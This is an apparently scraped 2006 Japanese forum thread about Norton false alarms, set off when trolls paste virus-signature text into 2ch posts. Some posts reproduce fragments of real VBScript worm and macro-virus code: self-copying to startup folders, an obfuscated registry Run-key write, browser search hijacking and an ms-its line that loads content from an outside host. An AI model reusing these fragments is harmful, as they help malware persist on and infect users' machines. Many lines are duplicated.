詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
ノートン誤作動対策本部
レス数が950を超えています。1000を超えると書き込みができなくなります。
1動け動けウゴウゴ2ちゃんねる
2005/11/28(月) 16:08:40ID:bR9gbCGm02006/06/22(木) 10:50:40ID:TVR/RmM30
もー うぜーよコード
2006/06/22(木) 11:55:44ID:DDn4hO0A0
2006/06/22(木) 12:50:25ID:6wncEhQn0
専ブラ読み込むたびにノートンの警告でるの止めたいのですが
2006/06/22(木) 15:01:47ID:b5m4Lmir0
あきたー
2006/06/23(金) 08:19:53ID:M0jLSZCw0
コード書いてる人は販促に必死なんですよとw
2006/06/23(金) 19:48:23ID:AL1OlihM0
929915-928
2006/06/24(土) 08:42:08ID:2lOlEW2f0 928の後、調べたところ、
アバストも設定で回避できるということがわかりました、
ノートンも確認済み。
(微妙にすれ違い失礼しました。)
アバストも設定で回避できるということがわかりました、
ノートンも確認済み。
(微妙にすれ違い失礼しました。)
930動け動けウゴウゴ2ちゃんねる
2006/06/25(日) 19:10:33ID:nPZXTUgCO コードの野郎どこにありやがる
2006/06/25(日) 19:23:07ID:UGUuM4ki0
ちと
2006/06/25(日) 19:25:22ID:UGUuM4ki0
失
2006/06/25(日) 19:27:52ID:UGUuM4ki0
例
2006/06/25(日) 19:30:03ID:UGUuM4ki0
礼、だな
2006/06/25(日) 19:32:09ID:UGUuM4ki0
じゃ
936動け動けウゴウゴ2ちゃんねる
2006/06/25(日) 20:40:15ID:qn/6XT870 NIS2005の場合(多分NIS2006も同じ)
タスクトレイのNISアイコンを左クリック>「Norton Internet Securityを開く」
NISが開いたら、左側の一覧から「Norton Internet Security」を選ぶ
システムの状態一覧から「ファイアーウォール」を選ぶ
左下にある「設定」ボタンを選ぶ
「ネットワーク」タブを選ぶ
「信頼」タブを選ぶ
「追加」を選ぶ
「個別」を選ぶ
アドレスに以下の数字の塊を一行でコピペする ← ここで、コピペができません。どうしたらいいですか?
タスクトレイのNISアイコンを左クリック>「Norton Internet Securityを開く」
NISが開いたら、左側の一覧から「Norton Internet Security」を選ぶ
システムの状態一覧から「ファイアーウォール」を選ぶ
左下にある「設定」ボタンを選ぶ
「ネットワーク」タブを選ぶ
「信頼」タブを選ぶ
「追加」を選ぶ
「個別」を選ぶ
アドレスに以下の数字の塊を一行でコピペする ← ここで、コピペができません。どうしたらいいですか?
2006/06/25(日) 20:42:43ID:nCHkLwhQ0
どうせ右クリ効かないとかだろ
初心者板行けと言いたいところだがctrl+v
初心者板行けと言いたいところだがctrl+v
938動け動けウゴウゴ2ちゃんねる
2006/06/25(日) 20:45:26ID:qn/6XT870 >>937
できました。 ありがとうございました。
できました。 ありがとうございました。
939動け動けウゴウゴ2ちゃんねる
2006/06/26(月) 23:19:03ID:04A0pu1O0 とあるスレ一覧更新したら「WScript.KakWorm」の警告がでます
どうやって誤検知除外したらいいのでしょうか?
どうやって誤検知除外したらいいのでしょうか?
940動け動けウゴウゴ2ちゃんねる
2006/06/27(火) 09:46:13ID:uiyLh7K90 つーか、例の構文貼られても遮断しなくなった。
ノートン側が折れて対応したって事なのか?
ノートン側が折れて対応したって事なのか?
2006/06/27(火) 13:32:56ID:uiyLh7K90
早とちり。しっかり遮断されますた。
NIS2006はIPリスト入力にコピペが使用できない糞仕様だから
http://mickey.mirv.net/2chnis.html
のIPリストを
http://www.vector.co.jp/soft/win95/util/se203480.html
でぶち込むのが楽。
NIS2006はIPリスト入力にコピペが使用できない糞仕様だから
http://mickey.mirv.net/2chnis.html
のIPリストを
http://www.vector.co.jp/soft/win95/util/se203480.html
でぶち込むのが楽。
2006/06/27(火) 14:03:31ID:XeZBA28+0
コピ Ctrl + C
ペ Ctrl + V
ペ Ctrl + V
2006/06/27(火) 19:16:53ID:BSUxyp6W0
ノーdを使うには10年早かったようです
944ベースボール
2006/06/27(火) 23:48:05ID:1VQnoBRk0 ノーd使うころには てめえら死んでんだろ
945動け動けウゴウゴ2ちゃんねる
2006/06/30(金) 05:12:55ID:uE8DR0NH0 ⊂二二二( ^ω^)二⊃ブーン
946動け動けウゴウゴ2ちゃんねる
2006/07/01(土) 17:16:01ID:NsDJ2PXW0 ttp://info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures
のノートン緊急対策を見て、アドレスに大量のIPアドレスを貼って、これで大丈夫だと思ったら、
芸スポの中田のスレで、またウィルス貼られてるし。
でも前と違って、他のスレは全部すぐ読める。前は30分遮断されたけど。
これは別の種類のなんちゃってウィルスかな?もうどうしたらいいかわからん。
次々といろんなコード貼るから、疲れる・・・
のノートン緊急対策を見て、アドレスに大量のIPアドレスを貼って、これで大丈夫だと思ったら、
芸スポの中田のスレで、またウィルス貼られてるし。
でも前と違って、他のスレは全部すぐ読める。前は30分遮断されたけど。
これは別の種類のなんちゃってウィルスかな?もうどうしたらいいかわからん。
次々といろんなコード貼るから、疲れる・・・
2006/07/01(土) 22:26:46ID:nhdTqzQc0
さっきから同じファイルばっかり表示して感染してる感染してるってノートンが騒いで
ます。まじめにうざいので黙らせる方法を教えてください。
ます。まじめにうざいので黙らせる方法を教えてください。
2006/07/01(土) 22:29:18ID:WnHkNvmn0
投げs
2006/07/01(土) 22:40:44ID:nhdTqzQc0
そういえば。この間延長キーを購入したんですが、支払って二週間たっても延長キー
とやらが添付されたメールが届かないんですよ。ウイルスバスターとかも
こんなもんなの?
とやらが添付されたメールが届かないんですよ。ウイルスバスターとかも
こんなもんなの?
2006/07/01(土) 23:27:31ID:p7Wa9d7a0
2006/07/01(土) 23:40:32ID:zSabBSVw0
ログ読めばわかるだろ
2006/07/01(土) 23:44:51ID:/zxCsbBj0
>>950
つ【NISでスレ内検索】
つ【NISでスレ内検索】
2006/07/01(土) 23:56:56ID:p7Wa9d7a0
>>951,952
ありがとうございます。
「インターネットワーム防止」だけで検索していたのでは見つかりませんね。
「NIS」検索で見つかりました。
>>842の方法で、つまりNISでは「インターネットワーム防止」を設定ではなくて、
http://mickey.mirv.net/2chnis.html のIP一覧を追加する、ですね。
ありがとうございます。
「インターネットワーム防止」だけで検索していたのでは見つかりませんね。
「NIS」検索で見つかりました。
>>842の方法で、つまりNISでは「インターネットワーム防止」を設定ではなくて、
http://mickey.mirv.net/2chnis.html のIP一覧を追加する、ですね。
2006/07/03(月) 02:04:02ID:X5vltHrw0
NGワードに追加してもNGワードの.txtが削除される・・・
955名無しさんの助言 ◆JogenOuJ66
2006/07/03(月) 22:00:11ID:QJ8Rl2YW0 専用ブラウザのフォルダ丸ごと監視対象から外す、これ最短。
2006/07/04(火) 12:44:52ID:/aiYUDG40
>>1と同じ状態になってるんだけどどうすればいいの・・・
2006/07/04(火) 13:19:50ID:iJitU0Ia0
958御法川将貴
2006/07/04(火) 23:58:50ID:b4n0I43F0 名無しさんの助言は 今すぐ立ち去れ
959御法川将貴
2006/07/05(水) 21:12:56ID:UnaLYAnA0 変態熊本県民が 万引きしたぞー
2006/07/08(土) 10:08:59ID:VMXk0zCF0
ためしにNAVの設定元に戻してみたら
引っかからなくなってるような。(<body onload=w****w()>)
シマンテックが対策した?
NISはもってないからわからんけど。
引っかからなくなってるような。(<body onload=w****w()>)
シマンテックが対策した?
NISはもってないからわからんけど。
2006/07/08(土) 13:54:58ID:fDcr40eH0
その書き込み何度みたことか・・・
2006/07/08(土) 14:33:46ID:pNlbLtYF0
その都度自分で試して設定やりなおす俺
963960
2006/07/09(日) 00:04:04ID:1L5D8Za90 vbsウイルスのソースじゃなくて侵入を検出して遮断しました、の
やつだよ。
やつだよ。
2006/07/09(日) 05:10:45ID:GupgbQi90
>>963
してないよ
してないよ
2006/07/09(日) 05:25:13ID:t51lbUR70
>>963
このウソツキ!!
このウソツキ!!
966動け動けウゴウゴ2ちゃんねる
2006/07/09(日) 09:18:36ID:HhYehN6h0 もう頭悪いからノーdの設定ができない。
自分の常連のスレ片っ端から張られてギコだめだし、
IEで見るようになった。
もう更新やめて別のアンチウィルスソフトにするかな。
それまで我慢してだ。
でもシマンテックの客が減るよな〜。
自分の常連のスレ片っ端から張られてギコだめだし、
IEで見るようになった。
もう更新やめて別のアンチウィルスソフトにするかな。
それまで我慢してだ。
でもシマンテックの客が減るよな〜。
967960
2006/07/09(日) 09:34:50ID:1L5D8Za90968960
2006/07/09(日) 09:58:03ID:1L5D8Za90 あ、レス読み違えたスマソ
うちでは何故かnavの設定戻して一度も開いたことないスレのログ取ってみても再現しない。
nav2005です。vbsウイルス用のフォルダ除外の設定はそのまま。
うちでは何故かnavの設定戻して一度も開いたことないスレのログ取ってみても再現しない。
nav2005です。vbsウイルス用のフォルダ除外の設定はそのまま。
2006/07/09(日) 11:57:57ID:kh5GFJWj0
2006/07/09(日) 14:39:36ID:t51lbUR70
まあとにかくNIS2004だと相変わらず反応するわけだ
972960
2006/07/09(日) 15:08:39ID:1L5D8Za90 >>971 レスthx
ログビューアみてたらワーム検出の監視ログが変なのに気づいた。
詳細: インターネットワーム保護が 0 個のシグネチャを監視しています。
になってる。全部監視OFF状態になってすり抜けてるだけかも。
確実にインターネットワーム防止をチェックしてるんだけど。。
とりあえずHTTP MSIE JavaScript OnLoad Rte CodeExecのみチェック外した状態なら
詳細: インターネットワーム保護が 568 個のシグネチャを監視しています。
になるようなのでそうしておきます。
ログビューアみてたらワーム検出の監視ログが変なのに気づいた。
詳細: インターネットワーム保護が 0 個のシグネチャを監視しています。
になってる。全部監視OFF状態になってすり抜けてるだけかも。
確実にインターネットワーム防止をチェックしてるんだけど。。
とりあえずHTTP MSIE JavaScript OnLoad Rte CodeExecのみチェック外した状態なら
詳細: インターネットワーム保護が 568 個のシグネチャを監視しています。
になるようなのでそうしておきます。
973960
2006/07/09(日) 15:36:17ID:1L5D8Za90 連投すまそ、
いろいろいじっても 0 個のシグネチャを監視していますから変わらなくなってしまった
こんなことに時間割くのは無駄だし更新サービス買うのはやめようと思います・・・orz
いろいろいじっても 0 個のシグネチャを監視していますから変わらなくなってしまった
こんなことに時間割くのは無駄だし更新サービス買うのはやめようと思います・・・orz
2006/07/09(日) 19:43:03ID:xL1TwppA0
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
975動け動けウゴウゴ2ちゃんねる
2006/07/11(火) 20:28:47ID:ic76RAqx0 今まで>>974みたいのを専ブラでNGワードに指定していたら、
難なく見ることができていました。
ところが、なぜか今は見られません。
現在も専ブラ上ではアボーソされているのですが、やっぱり見ることができません。
何かあったのでしょうか?
やっぱり誤作動なのでしょうか?
ちなみに今はノートンを無効にしています。
難なく見ることができていました。
ところが、なぜか今は見られません。
現在も専ブラ上ではアボーソされているのですが、やっぱり見ることができません。
何かあったのでしょうか?
やっぱり誤作動なのでしょうか?
ちなみに今はノートンを無効にしています。
2006/07/12(水) 02:08:08ID:YkmmZvA40
専ブラったっていろいろあるから
NGワードの処理の仕方も同じじゃない
NGワードの処理の仕方も同じじゃない
2006/07/12(水) 09:33:42ID:UPljDXSZ0
専ブラは変えてないなら
誤作動する文字列の種類が違うんでしょう。
おおまかに分けると誤反応には現状3種類ある(含シリア語ブラクラ)
誤作動する文字列の種類が違うんでしょう。
おおまかに分けると誤反応には現状3種類ある(含シリア語ブラクラ)
2006/07/12(水) 18:52:17ID:KcXuCgUg0
シリア語ブラクラでノートンが誤反応するのか??
979977
2006/07/12(水) 20:53:52ID:UPljDXSZ0 ごめん、シリア語ブラクラはノートンとは関係ないね。
最近ノートントラップと一緒に貼ってあったりするので混同してしまった。
最近ノートントラップと一緒に貼ってあったりするので混同してしまった。
2006/07/16(日) 22:37:21ID:ofCNhrjG0
t2.WriteLine('"Search Bar"="http://www.jethomepage.com/search.htm";');
t2.WriteLine('"Default_Search_URL"="http://www.jethomepage.com/search.htm";');
t2.WriteLine('"Search Page"="http://www.jethomepage.com/search.htm";');
strMsg= " ) (" & vbcrlf
strMsg= strMsg & "( ) ( ) " & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " -------------------------" & vbcrlf
strMsg= strMsg & " / ( ( ( /\" & vbcrlf
strMsg= strMsg & " / ( / \" & vbcrlf
strMsg= strMsg & " / ( ( / \" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & " | --- | |" & vbcrlf
strMsg= strMsg & " | ----- | | | |" & vbcrlf
strMsg= strMsg & " | | | --- | |" & vbcrlf
strMsg= strMsg & " | | | | |" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & "Mawanella is one of the Sri Lanka's Muslim Village." & vbcrlf
strMsg= strMsg & "This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt." & vbcrlf
strMsg= strMsg & "I hat this incident, What about you? I can destroy your computer" & vbcrlf
strMsg= strMsg & "I didn't do that because I am a peace-loving citizen."
t2.WriteLine('"Default_Search_URL"="http://www.jethomepage.com/search.htm";');
t2.WriteLine('"Search Page"="http://www.jethomepage.com/search.htm";');
strMsg= " ) (" & vbcrlf
strMsg= strMsg & "( ) ( ) " & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " -------------------------" & vbcrlf
strMsg= strMsg & " / ( ( ( /\" & vbcrlf
strMsg= strMsg & " / ( / \" & vbcrlf
strMsg= strMsg & " / ( ( / \" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & " | --- | |" & vbcrlf
strMsg= strMsg & " | ----- | | | |" & vbcrlf
strMsg= strMsg & " | | | --- | |" & vbcrlf
strMsg= strMsg & " | | | | |" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & "Mawanella is one of the Sri Lanka's Muslim Village." & vbcrlf
strMsg= strMsg & "This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt." & vbcrlf
strMsg= strMsg & "I hat this incident, What about you? I can destroy your computer" & vbcrlf
strMsg= strMsg & "I didn't do that because I am a peace-loving citizen."
2006/07/19(水) 12:50:11ID:7373/lmb0
レス数が950を超えています。1000を超えると書き込みができなくなります。
ニュース
- 松本人志が今春ついに復帰か…毎月1億円以上の売り上げ確実『ダウンタウンチャンネル(仮)』はテレビを破壊するのか? [ネギうどん★]
- スーパー「トンカツの 肉より高い キャベツかな」→「これくらいが適正価格」農業関係者の声も★2 [Gecko★]
- 日本気象協会に再びサイバー攻撃、tenki.jpの閲覧ほぼ不可能に…DDoS攻撃か [蚤の市★]
- 【文春】中居正広「9000万円女性トラブル」X子さんの訴えを握り潰した「フジテレビ幹部」★28 [Ailuropoda melanoleuca★]
- 【福岡】「いけないことと思っていた」…高校トイレにカメラを隠し同学年の女子を盗撮か、男子生徒逮捕 [Ikhtiandr★]
- 実質賃金、4カ月連続マイナス 11月、0.3%減 [少考さん★]
- ファン「中居くんをテレビから消して何の意味がある?戦争や貧困を消すべきなのに」 [112181773]
- るるさん、>>3と>>5をするのだ
- 右左がわからなくなる「左右盲」なるものがあるらしいぞ [394133584]
- 【悲報】北朝鮮、尹大統領打倒工作をしていたことが判明して大炎上wwwwwww [407370637]
- PS4の新品てもう売ってないの?
- 🏡👊👊👊🤥👊👊👊🏡